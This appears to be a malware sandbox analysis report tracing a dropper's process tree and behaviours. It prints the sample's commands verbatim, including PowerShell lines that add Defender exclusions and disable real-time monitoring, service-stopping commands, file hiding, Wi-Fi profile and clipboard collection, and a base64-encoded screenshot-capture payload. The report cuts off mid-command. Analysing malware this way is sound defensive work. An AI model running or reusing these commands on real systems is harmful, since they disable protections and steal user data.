description pid Process procid_target PID 3544 wrote to memory of 4860 3544 4363463463464363463463463.exe 94 PID 3544 wrote to memory of 4860 3544 4363463463464363463463463.exe 94 PID 3544 wrote to memory of 4860 3544 4363463463464363463463463.exe 94 PID 3544 wrote to memory of 3948 3544 4363463463464363463463463.exe 97 PID 3544 wrote to memory of 3948 3544 4363463463464363463463463.exe 97 PID 4860 wrote to memory of 3524 4860 clsid.exe 98 PID 4860 wrote to memory of 3524 4860 clsid.exe 98 PID 4860 wrote to memory of 3524 4860 clsid.exe 98 PID 4860 wrote to memory of 3524 4860 clsid.exe 98 PID 4860 wrote to memory of 3524 4860 clsid.exe 98 PID 4860 wrote to memory of 3524 4860 clsid.exe 98 PID 4860 wrote to memory of 3524 4860 clsid.exe 98 PID 4860 wrote to memory of 3524 4860 clsid.exe 98 PID 3544 wrote to memory of 4752 3544 4363463463464363463463463.exe 106 PID 3544 wrote to memory of 4752 3544 4363463463464363463463463.exe 106 PID 3544 wrote to memory of 3144 3544 4363463463464363463463463.exe 111 PID 3544 wrote to memory of 3144 3544 4363463463464363463463463.exe 111 PID 3544 wrote to memory of 3144 3544 4363463463464363463463463.exe 111 PID 3144 wrote to memory of 4540 3144 twztl.exe 112 PID 3144 wrote to memory of 4540 3144 twztl.exe 112 PID 3144 wrote to memory of 4540 3144 twztl.exe 112 PID 4540 wrote to memory of 2568 4540 sysppvrdnvs.exe 113 PID 4540 wrote to memory of 2568 4540 sysppvrdnvs.exe 113 PID 4540 wrote to memory of 2568 4540 sysppvrdnvs.exe 113 PID 4540 wrote to memory of 1768 4540 sysppvrdnvs.exe 115 PID 4540 wrote to memory of 1768 4540 sysppvrdnvs.exe 115 PID 4540 wrote to memory of 1768 4540 sysppvrdnvs.exe 115 PID 2568 wrote to memory of 3324 2568 cmd.exe 117 PID 2568 wrote to memory of 3324 2568 cmd.exe 117 PID 2568 wrote to memory of 3324 2568 cmd.exe 117 PID 1768 wrote to memory of 2840 1768 cmd.exe 118 PID 1768 wrote to memory of 2840 1768 cmd.exe 118 PID 1768 wrote to memory of 2840 1768 cmd.exe 118 PID 1768 wrote to memory of 2524 1768 cmd.exe 119 PID 1768 wrote to memory of 2524 1768 cmd.exe 119 PID 1768 wrote to memory of 2524 1768 cmd.exe 119 PID 1768 wrote to memory of 3384 1768 cmd.exe 120 PID 1768 wrote to memory of 3384 1768 cmd.exe 120 PID 1768 wrote to memory of 3384 1768 cmd.exe 120 PID 1768 wrote to memory of 3760 1768 cmd.exe 121 PID 1768 wrote to memory of 3760 1768 cmd.exe 121 PID 1768 wrote to memory of 3760 1768 cmd.exe 121 PID 1768 wrote to memory of 3516 1768 cmd.exe 122 PID 1768 wrote to memory of 3516 1768 cmd.exe 122 PID 1768 wrote to memory of 3516 1768 cmd.exe 122 PID 4540 wrote to memory of 3576 4540 sysppvrdnvs.exe 123 PID 4540 wrote to memory of 3576 4540 sysppvrdnvs.exe 123 PID 4540 wrote to memory of 3576 4540 sysppvrdnvs.exe 123 PID 4540 wrote to memory of 1640 4540 sysppvrdnvs.exe 125 PID 4540 wrote to memory of 1640 4540 sysppvrdnvs.exe 125 PID 1640 wrote to memory of 4592 1640 292098928.exe 126 PID 1640 wrote to memory of 4592 1640 292098928.exe 126 PID 1640 wrote to memory of 4364 1640 292098928.exe 128 PID 1640 wrote to memory of 4364 1640 292098928.exe 128 PID 4592 wrote to memory of 4260 4592 cmd.exe 130 PID 4592 wrote to memory of 4260 4592 cmd.exe 130 PID 4364 wrote to memory of 212 4364 cmd.exe 131 PID 4364 wrote to memory of 212 4364 cmd.exe 131 PID 3576 wrote to memory of 2588 3576 2537816796.exe 132 PID 3576 wrote to memory of 2588 3576 2537816796.exe 132 PID 3576 wrote to memory of 2588 3576 2537816796.exe 132 PID 4540 wrote to memory of 6072 4540 sysppvrdnvs.exe 139 PID 4540 wrote to memory of 6072 4540 sysppvrdnvs.exe 139 PID 4540 wrote to memory of 6072 4540 sysppvrdnvs.exe 139 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4020 attrib.exe 836 attrib.exe 1952 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3388
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe"C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3524
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe"C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4752
-
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2524
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3760
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
PID:3516
-
-
-
C:\Users\Admin\AppData\Local\Temp\2537816796.exeC:\Users\Admin\AppData\Local\Temp\2537816796.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Users\Admin\AppData\Local\Temp\1712418979.exeC:\Users\Admin\AppData\Local\Temp\1712418979.exe6⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122887⤵
- Drops file in System32 directory
PID:5540
-
-
C:\ProgramData\EED1.tmp"C:\ProgramData\EED1.tmp"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1892 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\EED1.tmp >> NUL8⤵
- System Location Discovery: System Language Discovery
PID:2700
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 10926⤵
- Program crash
PID:4956
-
-
-
C:\Users\Admin\AppData\Local\Temp\292098928.exeC:\Users\Admin\AppData\Local\Temp\292098928.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:4260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2751933726.exeC:\Users\Admin\AppData\Local\Temp\2751933726.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6072
-
-
C:\Users\Admin\AppData\Local\Temp\3135025858.exeC:\Users\Admin\AppData\Local\Temp\3135025858.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\3510420815.exeC:\Users\Admin\AppData\Local\Temp\3510420815.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:6016
-
-
-
C:\Users\Admin\AppData\Local\Temp\323862848.exeC:\Users\Admin\AppData\Local\Temp\323862848.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2020 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\2563814828.exeC:\Users\Admin\AppData\Local\Temp\2563814828.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1604
-
-
C:\Users\Admin\AppData\Local\Temp\72403897.exeC:\Users\Admin\AppData\Local\Temp\72403897.exe7⤵
- Checks computer location settings
- Executes dropped EXE
PID:3288 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:4020
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:5136
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:1240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1094527981.exeC:\Users\Admin\AppData\Local\Temp\1094527981.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2568
-
-
C:\Users\Admin\AppData\Local\Temp\1707518023.exeC:\Users\Admin\AppData\Local\Temp\1707518023.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2288
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"3⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
PID:2356 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:2520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI45042\Blsvr.exe5⤵PID:2024
-
C:\Users\Admin\AppData\Local\Temp\_MEI45042\Blsvr.exeC:\Users\Admin\AppData\Local\Temp\_MEI45042\Blsvr.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3968
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"3⤵
- Executes dropped EXE
PID:4196 -
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:3664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\stub.exe'"5⤵PID:3080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\stub.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:6056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"5⤵PID:3620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
PID:5216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:4044
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:1012
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:6104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵PID:5828
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵PID:5920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵PID:4488
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵PID:3824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:3456
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:1368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:5620
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:4800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe""5⤵
- Hide Artifacts: Hidden Files and Directories
PID:1320 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"6⤵
- Views/modifies file attributes
PID:4020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵PID:1200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:4276
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"5⤵PID:2004
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall6⤵
- Modifies registry key
PID:4576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1216
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:4904
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵PID:6064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:5556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
PID:1088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:5304
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5684
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3784 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:5640
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:5768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"5⤵PID:5972
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath6⤵PID:5828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:3496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGM